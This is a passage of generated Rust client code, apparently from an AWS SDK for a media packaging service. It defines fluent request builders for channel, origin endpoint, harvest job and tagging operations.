/// The ID of the Channel to delete.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
}
/// Fluent builder constructing a request to `DeleteOriginEndpoint`.
///
/// Deletes an existing OriginEndpoint.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct DeleteOriginEndpoint {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::delete_origin_endpoint_input::Builder,
}
impl DeleteOriginEndpoint {
/// Creates a new `DeleteOriginEndpoint`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::DeleteOriginEndpointOutput,
aws_smithy_http::result::SdkError<crate::error::DeleteOriginEndpointError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// The ID of the OriginEndpoint to delete.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the OriginEndpoint to delete.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
}
/// Fluent builder constructing a request to `DescribeChannel`.
///
/// Gets details about a Channel.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct DescribeChannel {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::describe_channel_input::Builder,
}
impl DescribeChannel {
/// Creates a new `DescribeChannel`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::DescribeChannelOutput,
aws_smithy_http::result::SdkError<crate::error::DescribeChannelError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// The ID of a Channel.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of a Channel.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
}
/// Fluent builder constructing a request to `DescribeHarvestJob`.
///
/// Gets details about an existing HarvestJob.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct DescribeHarvestJob {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::describe_harvest_job_input::Builder,
}
impl DescribeHarvestJob {
/// Creates a new `DescribeHarvestJob`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::DescribeHarvestJobOutput,
aws_smithy_http::result::SdkError<crate::error::DescribeHarvestJobError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// The ID of the HarvestJob.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the HarvestJob.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
}
/// Fluent builder constructing a request to `DescribeOriginEndpoint`.
///
/// Gets details about an existing OriginEndpoint.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct DescribeOriginEndpoint {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::describe_origin_endpoint_input::Builder,
}
impl DescribeOriginEndpoint {
/// Creates a new `DescribeOriginEndpoint`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::DescribeOriginEndpointOutput,
aws_smithy_http::result::SdkError<crate::error::DescribeOriginEndpointError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// The ID of the OriginEndpoint.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the OriginEndpoint.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
}
/// Fluent builder constructing a request to `ListChannels`.
///
/// Returns a collection of Channels.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct ListChannels {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::list_channels_input::Builder,
}
impl ListChannels {
/// Creates a new `ListChannels`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::ListChannelsOutput,
aws_smithy_http::result::SdkError<crate::error::ListChannelsError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// Create a paginator for this request
///
/// Paginators are used by calling [`send().await`](crate::paginator::ListChannelsPaginator::send) which returns a [`Stream`](tokio_stream::Stream).
pub fn into_paginator(self) -> crate::paginator::ListChannelsPaginator {
crate::paginator::ListChannelsPaginator::new(self.handle, self.inner)
}
/// Upper bound on number of records to return.
pub fn max_results(mut self, input: i32) -> Self {
self.inner = self.inner.max_results(input);
self
}
/// Upper bound on number of records to return.
pub fn set_max_results(mut self, input: std::option::Option<i32>) -> Self {
self.inner = self.inner.set_max_results(input);
self
}
/// A token used to resume pagination from the end of a previous request.
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.next_token(input.into());
self
}
/// A token used to resume pagination from the end of a previous request.
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_next_token(input);
self
}
}
/// Fluent builder constructing a request to `ListHarvestJobs`.
///
/// Returns a collection of HarvestJob records.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct ListHarvestJobs {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::list_harvest_jobs_input::Builder,
}
impl ListHarvestJobs {
/// Creates a new `ListHarvestJobs`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::ListHarvestJobsOutput,
aws_smithy_http::result::SdkError<crate::error::ListHarvestJobsError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// Create a paginator for this request
///
/// Paginators are used by calling [`send().await`](crate::paginator::ListHarvestJobsPaginator::send) which returns a [`Stream`](tokio_stream::Stream).
pub fn into_paginator(self) -> crate::paginator::ListHarvestJobsPaginator {
crate::paginator::ListHarvestJobsPaginator::new(self.handle, self.inner)
}
/// When specified, the request will return only HarvestJobs associated with the given Channel ID.
pub fn include_channel_id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.include_channel_id(input.into());
self
}
/// When specified, the request will return only HarvestJobs associated with the given Channel ID.
pub fn set_include_channel_id(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.inner = self.inner.set_include_channel_id(input);
self
}
/// When specified, the request will return only HarvestJobs in the given status.
pub fn include_status(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.include_status(input.into());
self
}
/// When specified, the request will return only HarvestJobs in the given status.
pub fn set_include_status(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.inner = self.inner.set_include_status(input);
self
}
/// The upper bound on the number of records to return.
pub fn max_results(mut self, input: i32) -> Self {
self.inner = self.inner.max_results(input);
self
}
/// The upper bound on the number of records to return.
pub fn set_max_results(mut self, input: std::option::Option<i32>) -> Self {
self.inner = self.inner.set_max_results(input);
self
}
/// A token used to resume pagination from the end of a previous request.
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.next_token(input.into());
self
}
/// A token used to resume pagination from the end of a previous request.
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_next_token(input);
self
}
}
/// Fluent builder constructing a request to `ListOriginEndpoints`.
///
/// Returns a collection of OriginEndpoint records.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct ListOriginEndpoints {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::list_origin_endpoints_input::Builder,
}
impl ListOriginEndpoints {
/// Creates a new `ListOriginEndpoints`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::ListOriginEndpointsOutput,
aws_smithy_http::result::SdkError<crate::error::ListOriginEndpointsError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// Create a paginator for this request
///
/// Paginators are used by calling [`send().await`](crate::paginator::ListOriginEndpointsPaginator::send) which returns a [`Stream`](tokio_stream::Stream).
pub fn into_paginator(self) -> crate::paginator::ListOriginEndpointsPaginator {
crate::paginator::ListOriginEndpointsPaginator::new(self.handle, self.inner)
}
/// When specified, the request will return only OriginEndpoints associated with the given Channel ID.
pub fn channel_id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.channel_id(input.into());
self
}
/// When specified, the request will return only OriginEndpoints associated with the given Channel ID.
pub fn set_channel_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_channel_id(input);
self
}
/// The upper bound on the number of records to return.
pub fn max_results(mut self, input: i32) -> Self {
self.inner = self.inner.max_results(input);
self
}
/// The upper bound on the number of records to return.
pub fn set_max_results(mut self, input: std::option::Option<i32>) -> Self {
self.inner = self.inner.set_max_results(input);
self
}
/// A token used to resume pagination from the end of a previous request.
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.next_token(input.into());
self
}
/// A token used to resume pagination from the end of a previous request.
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_next_token(input);
self
}
}
/// Fluent builder constructing a request to `ListTagsForResource`.
///
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct ListTagsForResource {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::list_tags_for_resource_input::Builder,
}
impl ListTagsForResource {
/// Creates a new `ListTagsForResource`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::ListTagsForResourceOutput,
aws_smithy_http::result::SdkError<crate::error::ListTagsForResourceError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
#[allow(missing_docs)] // documentation missing in model
pub fn resource_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.resource_arn(input.into());
self
}
#[allow(missing_docs)] // documentation missing in model
pub fn set_resource_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_resource_arn(input);
self
}
}
/// Fluent builder constructing a request to `RotateChannelCredentials`.
///
/// Changes the Channel's first IngestEndpoint's username and password. WARNING - This API is deprecated. Please use RotateIngestEndpointCredentials instead
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct RotateChannelCredentials {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::rotate_channel_credentials_input::Builder,
}
impl RotateChannelCredentials {
/// Creates a new `RotateChannelCredentials`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::RotateChannelCredentialsOutput,
aws_smithy_http::result::SdkError<crate::error::RotateChannelCredentialsError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// The ID of the channel to update.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the channel to update.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
}
/// Fluent builder constructing a request to `RotateIngestEndpointCredentials`.
///
/// Rotate the IngestEndpoint's username and password, as specified by the IngestEndpoint's id.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct RotateIngestEndpointCredentials {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::rotate_ingest_endpoint_credentials_input::Builder,
}
impl RotateIngestEndpointCredentials {
/// Creates a new `RotateIngestEndpointCredentials`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::RotateIngestEndpointCredentialsOutput,
aws_smithy_http::result::SdkError<crate::error::RotateIngestEndpointCredentialsError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// The ID of the channel the IngestEndpoint is on.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the channel the IngestEndpoint is on.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
/// The id of the IngestEndpoint whose credentials should be rotated
pub fn ingest_endpoint_id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.ingest_endpoint_id(input.into());
self
}
/// The id of the IngestEndpoint whose credentials should be rotated
pub fn set_ingest_endpoint_id(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.inner = self.inner.set_ingest_endpoint_id(input);
self
}
}
/// Fluent builder constructing a request to `TagResource`.
///
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct TagResource {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::tag_resource_input::Builder,
}
impl TagResource {
/// Creates a new `TagResource`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::TagResourceOutput,
aws_smithy_http::result::SdkError<crate::error::TagResourceError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
#[allow(missing_docs)] // documentation missing in model
pub fn resource_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.resource_arn(input.into());
self
}
#[allow(missing_docs)] // documentation missing in model
pub fn set_resource_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_resource_arn(input);
self
}
/// Adds a key-value pair to `Tags`.
///
/// To override the contents of this collection use [`set_tags`](Self::set_tags).
///
#[allow(missing_docs)] // documentation missing in model
pub fn tags(
mut self,
k: impl Into<std::string::String>,
v: impl Into<std::string::String>,
) -> Self {
self.inner = self.inner.tags(k.into(), v.into());
self
}
#[allow(missing_docs)] // documentation missing in model
pub fn set_tags(
mut self,
input: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
) -> Self {
self.inner = self.inner.set_tags(input);
self
}
}
/// Fluent builder constructing a request to `UntagResource`.
///
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct UntagResource {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::untag_resource_input::Builder,
}
impl UntagResource {
/// Creates a new `UntagResource`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::UntagResourceOutput,
aws_smithy_http::result::SdkError<crate::error::UntagResourceError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
#[allow(missing_docs)] // documentation missing in model
pub fn resource_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.resource_arn(input.into());
self
}
#[allow(missing_docs)] // documentation missing in model
pub fn set_resource_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_resource_arn(input);
self
}
/// Appends an item to `TagKeys`.
///
/// To override the contents of this collection use [`set_tag_keys`](Self::set_tag_keys).
///
/// The key(s) of tag to be deleted
pub fn tag_keys(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.tag_keys(input.into());
self
}
/// The key(s) of tag to be deleted
pub fn set_tag_keys(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.inner = self.inner.set_tag_keys(input);
self
}
}
/// Fluent builder constructing a request to `UpdateChannel`.
///
/// Updates an existing Channel.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct UpdateChannel {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::update_channel_input::Builder,
}
impl UpdateChannel {
/// Creates a new `UpdateChannel`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::UpdateChannelOutput,
aws_smithy_http::result::SdkError<crate::error::UpdateChannelError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// A short text description of the Channel.
pub fn description(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.description(input.into());
self
}
/// A short text description of the Channel.
pub fn set_description(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_description(input);
self
}
/// The ID of the Channel to update.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the Channel to update.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
}
/// Fluent builder constructing a request to `UpdateOriginEndpoint`.
///
/// Updates an existing OriginEndpoint.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct UpdateOriginEndpoint {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::update_origin_endpoint_input::Builder,
}
impl UpdateOriginEndpoint {
/// Creates a new `UpdateOriginEndpoint`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::UpdateOriginEndpointOutput,
aws_smithy_http::result::SdkError<crate::error::UpdateOriginEndpointError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// CDN Authorization credentials
pub fn authorization(mut self, input: crate::model::Authorization) -> Self {
self.inner = self.inner.authorization(input);
self
}
/// CDN Authorization credentials
pub fn set_authorization(
mut self,
input: std::option::Option<crate::model::Authorization>,
) -> Self {
self.inner = self.inner.set_authorization(input);
self
}
/// A Common Media Application Format (CMAF) packaging configuration.
pub fn cmaf_package(
mut self,
input: crate::model::CmafPackageCreateOrUpdateParameters,
) -> Self {
self.inner = self.inner.cmaf_package(input);
self
}
/// A Common Media Application Format (CMAF) packaging configuration.
pub fn set_cmaf_package(
mut self,
input: std::option::Option<crate::model::CmafPackageCreateOrUpdateParameters>,
) -> Self {
self.inner = self.inner.set_cmaf_package(input);
self
}
/// A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
pub fn dash_package(mut self, input: crate::model::DashPackage) -> Self {
self.inner = self.inner.dash_package(input);
self
}
/// A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
pub fn set_dash_package(
mut self,
input: std::option::Option<crate::model::DashPackage>,
) -> Self {
self.inner = self.inner.set_dash_package(input);
self
}
/// A short text description of the OriginEndpoint.
pub fn description(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.description(input.into());
self
}
/// A short text description of the OriginEndpoint.
pub fn set_description(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_description(input);
self
}
/// An HTTP Live Streaming (HLS) packaging configuration.
pub fn hls_package(mut self, input: crate::model::HlsPackage) -> Self {
self.inner = self.inner.hls_package(input);
self
}
/// An HTTP Live Streaming (HLS) packaging configuration.
pub fn set_hls_package(
mut self,
input: std::option::Option<crate::model::HlsPackage>,
) -> Self {
self.inner = self.inner.set_hls_package(input);
self
}
/// The ID of the OriginEndpoint to update.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the OriginEndpoint to update.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
/// A short string that will be appended to the end of the Endpoint URL.
pub fn manifest_name(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.manifest_name(input.into());
self
}
/// A short string that will be appended to the end of the Endpoint URL.
pub fn set_manifest_name(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.inner = self.inner.set_manifest_name(input);
self
}
/// A Microsoft Smooth Streaming (MSS) packaging configuration.
pub fn mss_package(mut self, input: crate::model::MssPackage) -> Self {
self.inner = self.inner.mss_package(input);
self
}
/// A Microsoft Smooth Streaming (MSS) packaging configuration.
pub fn set_mss_package(
mut self,
input: std::option::Option<crate::model::MssPackage>,
) -> Self {
self.inner = self.inner.set_mss_package(input);
self
}
/// Control whether origination of video is allowed for this OriginEndpoint. If set to ALLOW, the OriginEndpoint may by requested, pursuant to any other form of access control. If set to DENY, the OriginEndpoint may not be requested. This can be helpful for Live to VOD harvesting, or for temporarily disabling origination
pub fn origination(mut self, input: crate::model::Origination) -> Self {
self.inner = self.inner.origination(input);
self
}
/// Control whether origination of video is allowed for this OriginEndpoint. If set to ALLOW, the OriginEndpoint may by requested, pursuant to any other form of access control. If set to DENY, the OriginEndpoint may not be requested. This can be helpful for Live to VOD harvesting, or for temporarily disabling origination
pub fn set_origination(
mut self,
input: std::option::Option<crate::model::Origination>,
) -> Self {
self.inner = self.inner.set_origination(input);
self
}
/// Maximum duration (in seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
pub fn startover_window_seconds(mut self, input: i32) -> Self {
self.inner = self.inner.startover_window_seconds(input);
self
}
/// Maximum duration (in seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
pub fn set_startover_window_seconds(mut self, input: std::option::Option<i32>) -> Self {
self.inner = self.inner.set_startover_window_seconds(input);
self
}
/// Amount of delay (in seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
pub fn time_delay_seconds(mut self, input: i32) -> Self {
self.inner = self.inner.time_delay_seconds(input);
self
}
/// Amount of delay (in seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
pub fn set_time_delay_seconds(mut self, input: std::option::Option<i32>) -> Self {
self.inner = self.inner.set_time_delay_seconds(input);
self
}
/// Appends an item to `Whitelist`.
///
/// To override the contents of this collection use [`set_whitelist`](Self::set_whitelist).
///
/// A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
pub fn whitelist(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.whitelist(input.into());
self
}
/// A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
pub fn set_whitelist(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.inner = self.inner.set_whitelist(input);
self
}
}
}
impl Client {
/// Creates a client with the given service config and connector override.
pub fn from_conf_conn<C, E>(conf: crate::Config, conn: C) -> Self
where
C: aws_smithy_client::bounds::SmithyConnector<Error = E> + Send + 'static,
E: Into<aws_smithy_http::result::ConnectorError>,
{
let retry_config = conf.retry_config.as_ref().cloned().unwrap_or_default();
let timeout_config = conf.timeout_config.as_ref().cloned().unwrap_or_default();
let sleep_impl = conf.sleep_impl.clone();
let mut builder = aws_smithy_client::Builder::new()
.connector(aws_smithy_client::erase::DynConnector::new(conn))
.middleware(aws_smithy_client::erase::DynMiddleware::new(
crate::middleware::DefaultMiddleware::new(),
));
builder.set_retry_config(retry_config.into());
builder.set_timeout_config(timeout_config);
if let Some(sleep_impl) = sleep_impl {
builder.set_sleep_impl(Some(sleep_impl));
}
let client = builder.build();
Self {
handle: std::sync::Arc::new(Handle { client, conf }),
}
}
/// Creates a new client from a shared config.
#[cfg(any(feature = "rustls", feature = "native-tls"))]
pub fn new(sdk_config: &aws_types::sdk_config::SdkConfig) -> Self {
